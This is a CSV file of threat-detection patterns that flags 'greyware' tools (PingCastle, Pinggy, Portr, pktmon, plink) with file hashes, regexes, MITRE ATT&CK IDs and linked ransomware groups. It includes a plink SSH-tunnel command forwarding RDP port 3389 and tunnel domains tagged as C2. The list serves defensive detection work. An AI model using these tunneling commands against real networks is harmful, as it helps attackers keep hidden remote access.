"*db71a0c966e917def48ab32e67962d37dbfb4ad527f3e3c9615d6a45a69ba69b*",".{0,1000}db71a0c966e917def48ab32e67962d37dbfb4ad527f3e3c9615d6a45a69ba69b.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*dd550c264f7af33bca01b0e32d4504e8e69b0b7ab99b472d8b59b818c83b7b96*",".{0,1000}dd550c264f7af33bca01b0e32d4504e8e69b0b7ab99b472d8b59b818c83b7b96.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*dd625dc8684d4a9a60e5aea80ec9379841cc80f2c60e40d9737c89de5b32fb04*",".{0,1000}dd625dc8684d4a9a60e5aea80ec9379841cc80f2c60e40d9737c89de5b32fb04.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*e079f9dbcc51b905759c6a17d46979181b432b6e195aafaf3a3453b7d1d687dc*",".{0,1000}e079f9dbcc51b905759c6a17d46979181b432b6e195aafaf3a3453b7d1d687dc.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*e854c1bb27c02fbf6f86bbd1ca750d9cf70cd3a978d142e6d97119bc81cb1ee7*",".{0,1000}e854c1bb27c02fbf6f86bbd1ca750d9cf70cd3a978d142e6d97119bc81cb1ee7.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*e8e73f8cb4babe6bf59cdfa6090a183d1f8be8da8e13b19d5b8d66126800b41f*",".{0,1000}e8e73f8cb4babe6bf59cdfa6090a183d1f8be8da8e13b19d5b8d66126800b41f.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*e96e655341857f858ba7deb75afcc9eea4b8cd24af772720653ec7ce0617eeef*",".{0,1000}e96e655341857f858ba7deb75afcc9eea4b8cd24af772720653ec7ce0617eeef.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*ef13e3756e1108a1dc018ff356f1b50c418f2ddd25b701aeaf52f959c883c53d*",".{0,1000}ef13e3756e1108a1dc018ff356f1b50c418f2ddd25b701aeaf52f959c883c53d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*ef13e3756e1108a1dc018ff356f1b50c418f2ddd25b701aeaf52f959c883c53d*",".{0,1000}ef13e3756e1108a1dc018ff356f1b50c418f2ddd25b701aeaf52f959c883c53d.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*efa152281662334f2a353cd4819a9eba3b9fae144e50758487df31ab1974876f*",".{0,1000}efa152281662334f2a353cd4819a9eba3b9fae144e50758487df31ab1974876f.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*efb4c1b4ea3b74fcab1947c248122f03cf95df33b17b8d635d3a50c3a91726d1*",".{0,1000}efb4c1b4ea3b74fcab1947c248122f03cf95df33b17b8d635d3a50c3a91726d1.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*f681c61359c401aaad1cfd8b0e884a91f59499cb1347a42d9f4d4285e722dc29*",".{0,1000}f681c61359c401aaad1cfd8b0e884a91f59499cb1347a42d9f4d4285e722dc29.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*f813c9c83c7dabb18c93222073f548d1b7bb39d5ed580011cebc9fb34ea3060c*",".{0,1000}f813c9c83c7dabb18c93222073f548d1b7bb39d5ed580011cebc9fb34ea3060c.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*f9c6e9fef6d2fd03cb701bd047dcb58c0949f13af975b081346cb14afad8c2aa*",".{0,1000}f9c6e9fef6d2fd03cb701bd047dcb58c0949f13af975b081346cb14afad8c2aa.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*netwrix/pingcastle*",".{0,1000}netwrix\/pingcastle.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*NullSessionScanner.*",".{0,1000}NullSessionScanner\..{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*pingcastle*",".{0,1000}pingcastle.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.pingcastle.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*PingCastle.Contact@netwrix.com*",".{0,1000}PingCastle\.Contact\@netwrix\.com.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#email","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*PingCastle.cs*",".{0,1000}PingCastle\.cs.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","0","N/A","N/A","10","","N/A","","",""
"*PingCastle.exe*",".{0,1000}PingCastle\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","",""
"*PingCastle.Scanners*",".{0,1000}PingCastle\.Scanners.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*pingcastlecloud.exe*",".{0,1000}pingcastlecloud\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*PingCastleReporting.exe*",".{0,1000}PingCastleReporting\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*RemoteScanner.exe*",".{0,1000}RemoteScanner\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","",""
"*ROCAVulnerabilityTester*",".{0,1000}ROCAVulnerabilityTester.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","",""
"*SmbScanner.exe*",".{0,1000}SmbScanner\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","",""
"*UserAgent*PingCastleAutoUpdater*",".{0,1000}UserAgent.{0,1000}PingCastleAutoUpdater.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#useragent","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z"
"*ZeroLogonScanner.*",".{0,1000}ZeroLogonScanner\..{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","",""
"* a.pinggy.io*",".{0,1000}\sa\.pinggy\.io.{0,1000}","greyware_tool_keyword","pinggy","Create HTTP/TCP or TLS tunnels to your Mac/PC. Even if it is sitting behind firewalls and NATs.","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://pinggy.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.a.pinggy.online*",".{0,1000}\.a\.pinggy\.online.{0,1000}","greyware_tool_keyword","pinggy","Create HTTP/TCP or TLS tunnels to your Mac/PC. Even if it is sitting behind firewalls and NATs.","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://pinggy.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.free.pinggy.online*",".{0,1000}\.free\.pinggy\.online.{0,1000}","greyware_tool_keyword","pinggy","Create HTTP/TCP or TLS tunnels to your Mac/PC. Even if it is sitting behind firewalls and NATs.","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://pinggy.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/a.pinggy.io*",".{0,1000}\/a\.pinggy\.io.{0,1000}","greyware_tool_keyword","pinggy","Create HTTP/TCP or TLS tunnels to your Mac/PC. Even if it is sitting behind firewalls and NATs.","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://pinggy.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*@a.pinggy.io*",".{0,1000}\@a\.pinggy\.io.{0,1000}","greyware_tool_keyword","pinggy","Create HTTP/TCP or TLS tunnels to your Mac/PC. Even if it is sitting behind firewalls and NATs.","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://pinggy.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*pktmon start*",".{0,1000}pktmon\sstart.{0,1000}","greyware_tool_keyword","pktmon","pktmon network diagnostics tool for Windows that can be used for packet capture - packet drop detection - packet filtering and counting.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*plink -N -L *:localhost:3389 *",".{0,1000}plink\s\-N\s\-L\s.{0,1000}\:localhost\:3389\s.{0,1000}","greyware_tool_keyword","plink","creates an SSH tunnel from the local machine to the remote machine allowing the user to connect to an RDP session on the remote machine through port 3389. This plink usage is often used by attackers","T1573 - T1021.004 - T1213.002","TA0010 - TA0011 - TA0008","N/A","BlackCat - PLAY - LockBit - Scattered Spider*","Persistence","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"* on http://localhost:7777*",".{0,1000}\son\shttp\:\/\/localhost\:7777.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"* Portr inspector running on *",".{0,1000}\sPortr\sinspector\srunning\son\s.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"* portr.exe*",".{0,1000}\sportr\.exe.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/amalshaji/portr-admin/*",".{0,1000}\/amalshaji\/portr\-admin\/.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/bin/portr*",".{0,1000}\/bin\/portr.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/portr.exe*",".{0,1000}\/portr\.exe.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/portr.git*",".{0,1000}\/portr\.git.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/portr/releases*",".{0,1000}\/portr\/releases.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/portr_*_Darwin_arm64.zip*",".{0,1000}\/portr_.{0,1000}_Darwin_arm64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/portr_*_Darwin_x86_64.zip*",".{0,1000}\/portr_.{0,1000}_Darwin_x86_64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/portr_*_Linux_arm64.zip*",".{0,1000}\/portr_.{0,1000}_Linux_arm64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/portr_*_Linux_x86_64.zip*",".{0,1000}\/portr_.{0,1000}_Linux_x86_64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/portr_*_Windows_arm64.zip*",".{0,1000}\/portr_.{0,1000}_Windows_arm64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/portr_*_Windows_x86_64.zip*",".{0,1000}\/portr_.{0,1000}_Windows_x86_64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*/portr_admin/*.py*",".{0,1000}\/portr_admin\/.{0,1000}\.py.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*\portr.exe*",".{0,1000}\\portr\.exe.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*\portr-main\*",".{0,1000}\\portr\-main\\.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*04aeff8ca9ced185a7f1e860e046fcfbf47b5345d4480b3015937978fe2d2ecb*",".{0,1000}04aeff8ca9ced185a7f1e860e046fcfbf47b5345d4480b3015937978fe2d2ecb.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*0927710fe2ab1e73a1797de36da9ada6322b8ac8ce473fc2db3a8b70b3ce141b*",".{0,1000}0927710fe2ab1e73a1797de36da9ada6322b8ac8ce473fc2db3a8b70b3ce141b.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*0c6710b58b9054fd232c624dae29020bc765c962ae095a3eb53a0981379689b8*",".{0,1000}0c6710b58b9054fd232c624dae29020bc765c962ae095a3eb53a0981379689b8.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*0f3a3f091d06f67f44077711477c0908a957f161d178d9ad8942fee864ed7a29*",".{0,1000}0f3a3f091d06f67f44077711477c0908a957f161d178d9ad8942fee864ed7a29.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*1350cbc251898cdd6fc09f6ac24ff69b68ddb95ea71379dee9f598a62b484430*",".{0,1000}1350cbc251898cdd6fc09f6ac24ff69b68ddb95ea71379dee9f598a62b484430.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*1c76ba5931eda89deb05158b1abbac7f740a594509f3620c52fa66287a5e7a6e*",".{0,1000}1c76ba5931eda89deb05158b1abbac7f740a594509f3620c52fa66287a5e7a6e.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*1d57d63ec9e3ec8fb3b527132e6603c81d8bdea62141c25c29e7d9e24b026e9f*",".{0,1000}1d57d63ec9e3ec8fb3b527132e6603c81d8bdea62141c25c29e7d9e24b026e9f.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*224de67abbba2df8eb17aa567bb2b3be029ad21e4203692b6abb73628e75db02*",".{0,1000}224de67abbba2df8eb17aa567bb2b3be029ad21e4203692b6abb73628e75db02.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*34b5107c27cbae4cab4addfece8236d168102d7d6cc3ee93d29bf4d4b550065c*",".{0,1000}34b5107c27cbae4cab4addfece8236d168102d7d6cc3ee93d29bf4d4b550065c.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*3f3be7d94aa91ed9d14a8c8f37413d2a3057c0a2758d579189c84904285007d5*",".{0,1000}3f3be7d94aa91ed9d14a8c8f37413d2a3057c0a2758d579189c84904285007d5.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
"*451d8fa3adce80028ea451e1ddf7a185ea4a3329aae156bf40fdda5d1ac60c84*",".{0,1000}451d8fa3adce80028ea451e1ddf7a185ea4a3329aae156bf40fdda5d1ac60c84.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z"
